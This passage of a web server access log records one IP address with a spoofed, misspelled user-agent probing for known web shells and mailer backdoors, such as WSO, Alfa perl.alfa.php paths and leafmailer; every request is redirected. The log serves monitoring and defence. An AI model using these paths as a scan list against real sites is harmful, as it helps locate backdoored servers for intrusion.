94.16.113.252 - - [13/Aug/2025:03:53:35 -0400] "GET /h.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:37 -0400] "GET /j.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:39 -0400] "GET /k.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:43 -0400] "GET /l.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:44 -0400] "GET /n.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:47 -0400] "GET /xindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:50 -0400] "GET /kindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:55 -0400] "GET /FoxWSOv1.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:58 -0400] "GET /alf.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:04 -0400] "GET /bb.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:08 -0400] "GET /lf.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:13 -0400] "GET /WSO.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:17 -0400] "GET /xxx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:21 -0400] "GET /hello.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:24 -0400] "GET /ok.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:28 -0400] "GET /if.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:31 -0400] "GET /kk.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:33 -0400] "GET /mrjn.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:38 -0400] "GET /kn.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:40 -0400] "GET /3301.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:43 -0400] "GET /leaf.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:48 -0400] "GET /alex.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:52 -0400] "GET /mailer.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:55 -0400] "GET /anone.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:54:58 -0400] "GET /wp-configer.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:01 -0400] "GET /wp-ad.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:06 -0400] "GET /send.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:08 -0400] "GET /3.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:11 -0400] "GET /.wp-cache.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:15 -0400] "GET /sendmail.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:18 -0400] "GET /rahma.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:22 -0400] "GET /nasgor.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:24 -0400] "GET /wp-confirm.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:27 -0400] "GET /alfa123.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:31 -0400] "GET /upload.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:33 -0400] "GET /bypass.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:35 -0400] "GET /wp-one.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:38 -0400] "GET /alexus.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:41 -0400] "GET /wso1337.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:43 -0400] "GET /1337.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:45 -0400] "GET /blog.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:49 -0400] "GET /it.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:55:59 -0400] "GET /kiss.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:03 -0400] "GET /0.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:05 -0400] "GET /wp2.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:08 -0400] "GET /owl.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:10 -0400] "GET /vuln.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:12 -0400] "GET /ohayo.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:18 -0400] "GET /wp-admin.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:22 -0400] "GET /cms.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:24 -0400] "GET /wp-uploads.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:27 -0400] "GET /Gel.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:29 -0400] "GET /41.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:34 -0400] "GET /4price.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:37 -0400] "GET /MARIJUANA.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:43 -0400] "GET /marijuana.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:45 -0400] "GET /.fk.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:49 -0400] "GET /XxX.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:53 -0400] "GET /alexuse.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:57 -0400] "GET /Sendemail.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:56:58 -0400] "GET /content.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:03 -0400] "GET /leafmailer2.8.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:06 -0400] "GET /olu.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:10 -0400] "GET /alexusmailer%202.0.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:11 -0400] "GET /rss.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:13 -0400] "GET /alexus-mailer.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:16 -0400] "GET /wp-file.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:19 -0400] "GET /wso2.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:21 -0400] "GET /wso1.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:24 -0400] "GET /olux.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:27 -0400] "GET /wp-info.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:29 -0400] "GET /xl.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:32 -0400] "GET /wp-confiig.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:36 -0400] "GET /file-manager.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:41 -0400] "GET /uploader.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:45 -0400] "GET /leafmailer.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:47 -0400] "GET /ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:49 -0400] "GET /.well-known/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:53 -0400] "GET /tmp_images/alfacgiapi/perl.alfa.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:57:59 -0400] "GET /wp-admin/alfacgiapi/perl.alfa.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:02 -0400] "GET /wp-content/alfacgiapi/perl.alfa.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:05 -0400] "GET /wp-includes/alfacgiapi/perl.alfa.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:07 -0400] "GET /alfacgiapi/perl.alfa.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:11 -0400] "GET /css/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:12 -0400] "GET /files/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:16 -0400] "GET /images/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:18 -0400] "GET /ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:21 -0400] "GET /wp-admin/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 278 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:24 -0400] "GET /wp-content/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 280 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:28 -0400] "GET /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 277 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:31 -0400] "GET /date.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:32 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:34 -0400] "GET /alfaindex.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:58:38 -0400] "GET /.alf.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) 